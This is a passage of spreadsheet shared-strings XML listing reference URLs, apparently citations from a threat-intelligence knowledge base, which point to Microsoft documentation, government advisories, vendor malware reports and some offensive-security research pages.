  <si>
    <t>https://technet.microsoft.com/library/cc794757.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/ms679833.aspx</t>
  </si>
  <si>
    <t>http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf</t>
  </si>
  <si>
    <t>http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/ms677949.aspx</t>
  </si>
  <si>
    <t>https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637</t>
  </si>
  <si>
    <t>https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/cc961760.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/win32/services/service-control-manager</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps</t>
  </si>
  <si>
    <t>https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx</t>
  </si>
  <si>
    <t>https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/sysinternals/downloads/sigcheck</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk</t>
  </si>
  <si>
    <t>https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover</t>
  </si>
  <si>
    <t>https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-server/administration/windows-commands/sxstrace</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/sysinternals/downloads/sysmon</t>
  </si>
  <si>
    <t>https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option</t>
  </si>
  <si>
    <t>https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb491010.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx</t>
  </si>
  <si>
    <t>https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help</t>
  </si>
  <si>
    <t>https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&amp;threatId=-2147336918</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/cc755321.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/ee791851(v=ws.11)?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/office/vba/api/overview/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes</t>
  </si>
  <si>
    <t>https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/api/</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/ms687393</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/aa384426</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/scripting/winscript/windows-script-interfaces</t>
  </si>
  <si>
    <t>https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script</t>
  </si>
  <si>
    <t>https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0</t>
  </si>
  <si>
    <t>https://www.microsoft.com/download/details.aspx?id=21714</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490994.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules</t>
  </si>
  <si>
    <t>https://github.com/huntergregal/mimipenguin</t>
  </si>
  <si>
    <t>https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/</t>
  </si>
  <si>
    <t>https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection</t>
  </si>
  <si>
    <t>https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html</t>
  </si>
  <si>
    <t>https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf</t>
  </si>
  <si>
    <t>https://blog.morphisec.com/cobalt-gang-2.0</t>
  </si>
  <si>
    <t>http://blog.morphisec.com/fin7-attacks-restaurant-industry</t>
  </si>
  <si>
    <t>https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode</t>
  </si>
  <si>
    <t>http://blog.morphisec.com/security-alert-fin8-is-back</t>
  </si>
  <si>
    <t>https://msitpros.com/?p=3909</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/</t>
  </si>
  <si>
    <t>https://docs.mythic-c2.net/</t>
  </si>
  <si>
    <t>https://github.com/its-a-feature/Mythic</t>
  </si>
  <si>
    <t>https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2018/11/08/rokrat-analysis/</t>
  </si>
  <si>
    <t>https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory</t>
  </si>
  <si>
    <t>https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation</t>
  </si>
  <si>
    <t>https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary</t>
  </si>
  <si>
    <t>https://digital.nhs.uk/cyber-alerts/2020/cc-3633</t>
  </si>
  <si>
    <t>https://digital.nhs.uk/cyber-alerts/2020/cc-3603</t>
  </si>
  <si>
    <t>https://pages.nist.gov/800-63-3/sp800-63b.html</t>
  </si>
  <si>
    <t>https://csrc.nist.gov/glossary/term/authentication</t>
  </si>
  <si>
    <t>https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication</t>
  </si>
  <si>
    <t>https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf</t>
  </si>
  <si>
    <t>https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif</t>
  </si>
  <si>
    <t>https://github.com/nsacyber/Mitigating-Web-Shells</t>
  </si>
  <si>
    <t>https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF</t>
  </si>
  <si>
    <t>https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm</t>
  </si>
  <si>
    <t>https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf</t>
  </si>
  <si>
    <t>https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm</t>
  </si>
  <si>
    <t>https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF</t>
  </si>
  <si>
    <t>https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF</t>
  </si>
  <si>
    <t>https://undocumented.ntinternals.net/</t>
  </si>
  <si>
    <t>https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2014-7169</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2016-6662</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2017-0176</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2019-3610</t>
  </si>
  <si>
    <t>https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/</t>
  </si>
  <si>
    <t>https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html</t>
  </si>
  <si>
    <t>https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/</t>
  </si>
  <si>
    <t>https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/</t>
  </si>
  <si>
    <t>https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/</t>
  </si>
  <si>
    <t>https://blog.netspi.com/attacking-sql-server-clr-assemblies/</t>
  </si>
  <si>
    <t>https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/</t>
  </si>
  <si>
    <t>https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/</t>
  </si>
  <si>
    <t>https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service</t>
  </si>
  <si>
    <t>https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection</t>
  </si>
  <si>
    <t>https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique</t>
  </si>
  <si>
    <t>https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot</t>
  </si>
  <si>
    <t>https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/</t>
  </si>
  <si>
    <t>https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5</t>
  </si>
  <si>
    <t>https://ss64.com/nt/nltest.html</t>
  </si>
  <si>
    <t>https://nmap.org/book/firewalls.html</t>
  </si>
  <si>
    <t>https://nodejs.org/</t>
  </si>
  <si>
    <t>https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html</t>
  </si>
  <si>
    <t>https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf</t>
  </si>
  <si>
    <t>https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf</t>
  </si>
  <si>
    <t>https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf</t>
  </si>
  <si>
    <t>https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf</t>
  </si>
  <si>
    <t>http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf</t>
  </si>
  <si>
    <t>http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess</t>
  </si>
  <si>
    <t>https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/</t>
  </si>
  <si>
    <t>https://o365blog.com/post/deviceidentity/</t>
  </si>
  <si>
    <t>https://www.opm.gov/cybersecurity/cybersecurity-incidents/</t>
  </si>
  <si>
    <t>http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x2A.html</t>
  </si>
  <si>
    <t>https://www.netmeister.org/blog/keychain-passwords.html</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/</t>
  </si>
  <si>
    <t>https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf</t>
  </si>
  <si>
    <t>https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/Binary_planting</t>
  </si>
  <si>
    <t>https://owasp.org/www-community/attacks/CSV_Injection</t>
  </si>
  <si>
    <t>https://wiki.owasp.org/index.php/OAT-004_Fingerprinting</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</t>
  </si>
  <si>
    <t>https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning</t>
  </si>
  <si>
    <t>https://objective-see.com/blog/blog_0x68.html</t>
  </si>
  <si>
    <t>https://objective-see.org/blog/blog_0x69.html</t>
  </si>
  <si>
    <t>https://objective-see.org/blog/blog_0x49.html</t>
  </si>
  <si>
    <t>https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html</t>
  </si>
  <si>
    <t>https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update</t>
  </si>
  <si>
    <t>https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/</t>
  </si>
  <si>
    <t>https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/</t>
  </si>
  <si>
    <t>https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/</t>
  </si>
  <si>
    <t>https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/</t>
  </si>
  <si>
    <t>https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&amp;rs=en-us&amp;ad=us</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/microsoft-365/commerce/manage-partners?view=o365-worldwide</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Onion_routing</t>
  </si>
  <si>
    <t>https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac</t>
  </si>
  <si>
    <t>https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363</t>
  </si>
  <si>
    <t>http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf</t>
  </si>
  <si>
    <t>http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf</t>
  </si>
  <si>
    <t>https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/</t>
  </si>
  <si>
    <t>https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html</t>
  </si>
  <si>
    <t>https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/</t>
  </si>
  <si>
    <t>https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/</t>
  </si>
  <si>
    <t>https://outflank.nl/blog/2018/08/14/html-smuggling-explained/</t>
  </si>
  <si>
    <t>https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/</t>
  </si>
  <si>
    <t>https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943</t>
  </si>
  <si>
    <t>https://github.com/zephrax/linux-pam-backdoor</t>
  </si>
  <si>
    <t>https://x-c3ll.github.io/posts/PAM-backdoor-DNS/</t>
  </si>
  <si>
    <t>https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling</t>
  </si>
  <si>
    <t>https://www.pcmag.com/encyclopedia/term/double-extension</t>
  </si>
  <si>
    <t>https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages</t>
  </si>
  <si>
    <t>http://man7.org/linux/man-pages/man2/ptrace.2.html</t>
  </si>
  <si>
    <t>https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf</t>
  </si>
  <si>
    <t>https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf</t>
  </si>
  <si>
    <t>https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf</t>
  </si>
  <si>
    <t>https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</t>
  </si>
  <si>
    <t>https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html</t>
  </si>
  <si>
    <t>http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html</t>
  </si>
  <si>
    <t>https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html</t>
  </si>
  <si>
    <t>https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html</t>
  </si>
  <si>
    <t>http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf</t>
  </si>
  <si>
    <t>https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/uncommon-arp-cache-listing-via-arp-exe.html</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/</t>
  </si>
  <si>
